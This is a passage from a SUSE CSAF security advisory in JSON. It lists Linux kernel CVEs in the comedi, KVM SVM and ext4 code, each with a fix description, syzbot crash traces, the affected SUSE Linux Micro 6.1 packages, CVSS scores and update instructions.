"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68256"
},
{
"cve": "CVE-2025-68257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: check device\u0027s attached status in compat ioctls\n\nSyzbot identified an issue [1] that crashes kernel, seemingly due to\nunexistent callback dev-\u003eget_valid_routes(). By all means, this should\nnot occur as said callback must always be set to\nget_zero_valid_routes() in __comedi_device_postconfig().\n\nAs the crash seems to appear exclusively in i386 kernels, at least,\njudging from [1] reports, the blame lies with compat versions\nof standard IOCTL handlers. Several of them are modified and\ndo not use comedi_unlocked_ioctl(). While functionality of these\nioctls essentially copy their original versions, they do not\nhave required sanity check for device\u0027s attached status. This,\nin turn, leads to a possibility of calling select IOCTLs on a\ndevice that has not been properly setup, even via COMEDI_DEVCONFIG.\n\nDoing so on unconfigured devices means that several crucial steps\nare missed, for instance, specifying dev-\u003eget_valid_routes()\ncallback.\n\nFix this somewhat crudely by ensuring device\u0027s attached status before\nperforming any ioctls, improving logic consistency between modern\nand compat functions.\n\n[1] Syzbot report:\nBUG: kernel NULL pointer dereference, address: 0000000000000000\n...\nCR2: ffffffffffffffd6 CR3: 000000006c717000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n get_valid_routes drivers/comedi/comedi_fops.c:1322 [inline]\n parse_insn+0x78c/0x1970 drivers/comedi/comedi_fops.c:1401\n do_insnlist_ioctl+0x272/0x700 drivers/comedi/comedi_fops.c:1594\n compat_insnlist drivers/comedi/comedi_fops.c:3208 [inline]\n comedi_compat_ioctl+0x810/0x990 drivers/comedi/comedi_fops.c:3273\n __do_compat_sys_ioctl fs/ioctl.c:695 [inline]\n __se_compat_sys_ioctl fs/ioctl.c:638 [inline]\n __ia32_compat_sys_ioctl+0x242/0x370 fs/ioctl.c:638\n do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]\n...",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68257",
"url": "https://www.suse.com/security/cve/CVE-2025-68257"
},
{
"category": "external",
"summary": "SUSE Bug 1255167 for CVE-2025-68257",
"url": "https://bugzilla.suse.com/1255167"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68257"
},
{
"cve": "CVE-2025-68258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: multiq3: sanitize config options in multiq3_attach()\n\nSyzbot identified an issue [1] in multiq3_attach() that induces a\ntask timeout due to open() or COMEDI_DEVCONFIG ioctl operations,\nspecifically, in the case of multiq3 driver.\n\nThis problem arose when syzkaller managed to craft weird configuration\noptions used to specify the number of channels in encoder subdevice.\nIf a particularly great number is passed to s-\u003en_chan in\nmultiq3_attach() via it-\u003eoptions[2], then multiple calls to\nmultiq3_encoder_reset() at the end of driver-specific attach() method\nwill be running for minutes, thus blocking tasks and affected devices\nas well.\n\nWhile this issue is most likely not too dangerous for real-life\ndevices, it still makes sense to sanitize configuration inputs. Enable\na sensible limit on the number of encoder chips (4 chips max, each\nwith 2 channels) to stop this behaviour from manifesting.\n\n[1] Syzbot crash:\nINFO: task syz.2.19:6067 blocked for more than 143 seconds.\n...\nCall Trace:\n \u003cTASK\u003e\n context_switch kernel/sched/core.c:5254 [inline]\n __schedule+0x17c4/0x4d60 kernel/sched/core.c:6862\n __schedule_loop kernel/sched/core.c:6944 [inline]\n schedule+0x165/0x360 kernel/sched/core.c:6959\n schedule_preempt_disabled+0x13/0x30 kernel/sched/core.c:7016\n __mutex_lock_common kernel/locking/mutex.c:676 [inline]\n __mutex_lock+0x7e6/0x1350 kernel/locking/mutex.c:760\n comedi_open+0xc0/0x590 drivers/comedi/comedi_fops.c:2868\n chrdev_open+0x4cc/0x5e0 fs/char_dev.c:414\n do_dentry_open+0x953/0x13f0 fs/open.c:965\n vfs_open+0x3b/0x340 fs/open.c:1097\n...",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68258",
"url": "https://www.suse.com/security/cve/CVE-2025-68258"
},
{
"category": "external",
"summary": "SUSE Bug 1255182 for CVE-2025-68258",
"url": "https://bugzilla.suse.com/1255182"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68258"
},
{
"cve": "CVE-2025-68259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: SVM: Don\u0027t skip unrelated instruction if INT3/INTO is replaced\n\nWhen re-injecting a soft interrupt from an INT3, INT0, or (select) INTn\ninstruction, discard the exception and retry the instruction if the code\nstream is changed (e.g. by a different vCPU) between when the CPU\nexecutes the instruction and when KVM decodes the instruction to get the\nnext RIP.\n\nAs effectively predicted by commit 6ef88d6e36c2 (\"KVM: SVM: Re-inject\nINT3/INTO instead of retrying the instruction\"), failure to verify that\nthe correct INTn instruction was decoded can effectively clobber guest\nstate due to decoding the wrong instruction and thus specifying the\nwrong next RIP.\n\nThe bug most often manifests as \"Oops: int3\" panics on static branch\nchecks in Linux guests. Enabling or disabling a static branch in Linux\nuses the kernel\u0027s \"text poke\" code patching mechanism. To modify code\nwhile other CPUs may be executing that code, Linux (temporarily)\nreplaces the first byte of the original instruction with an int3 (opcode\n0xcc), then patches in the new code stream except for the first byte,\nand finally replaces the int3 with the first byte of the new code\nstream. If a CPU hits the int3, i.e. executes the code while it\u0027s being\nmodified, then the guest kernel must look up the RIP to determine how to\nhandle the #BP, e.g. by emulating the new instruction. If the RIP is\nincorrect, then this lookup fails and the guest kernel panics.\n\nThe bug reproduces almost instantly by hacking the guest kernel to\nrepeatedly check a static branch[1] while running a drgn script[2] on\nthe host to constantly swap out the memory containing the guest\u0027s TSS.\n\n[1]: https://gist.github.com/osandov/44d17c51c28c0ac998ea0334edf90b5a\n[2]: https://gist.github.com/osandov/10e45e45afa29b11e0c7209247afc00b",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68259",
"url": "https://www.suse.com/security/cve/CVE-2025-68259"
},
{
"category": "external",
"summary": "SUSE Bug 1255199 for CVE-2025-68259",
"url": "https://bugzilla.suse.com/1255199"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68259"
},
{
"cve": "CVE-2025-68261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: add i_data_sem protection in ext4_destroy_inline_data_nolock()\n\nFix a race between inline data destruction and block mapping.\n\nThe function ext4_destroy_inline_data_nolock() changes the inode data\nlayout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS.\nAt the same time, another thread may execute ext4_map_blocks(), which\ntests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks()\nor ext4_ind_map_blocks().\n\nWithout i_data_sem protection, ext4_ind_map_blocks() may receive inode\nwith EXT4_INODE_EXTENTS flag and triggering assert.\n\nkernel BUG at fs/ext4/indirect.c:546!\nEXT4-fs (loop2): unmounting filesystem.\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014\nRIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546\n\nCall Trace:\n \u003cTASK\u003e\n ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681\n _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822\n ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124\n ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255\n ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000\n generic_perform_write+0x259/0x5d0 mm/filemap.c:3846\n ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285\n ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679\n call_write_iter include/linux/fs.h:2271 [inline]\n do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735\n do_iter_write+0x186/0x710 fs/read_write.c:861\n vfs_iter_write+0x70/0xa0 fs/read_write.c:902\n iter_file_splice_write+0x73b/0xc90 fs/splice.c:685\n do_splice_from fs/splice.c:763 [inline]\n direct_splice_actor+0x10f/0x170 fs/splice.c:950\n splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896\n do_splice_direct+0x1a9/0x280 fs/splice.c:1002\n do_sendfile+0xb13/0x12c0 fs/read_write.c:1255\n __do_sys_sendfile64 fs/read_write.c:1323 [inline]\n __se_sys_sendfile64 fs/read_write.c:1309 [inline]\n __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68261",
"url": "https://www.suse.com/security/cve/CVE-2025-68261"
},
{
"category": "external",
"summary": "SUSE Bug 1255164 for CVE-2025-68261",
"url": "https://bugzilla.suse.com/1255164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68261"
},
{
"cve": "CVE-2025-68264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68264"
}
],
"notes": [
{
"category": "general",
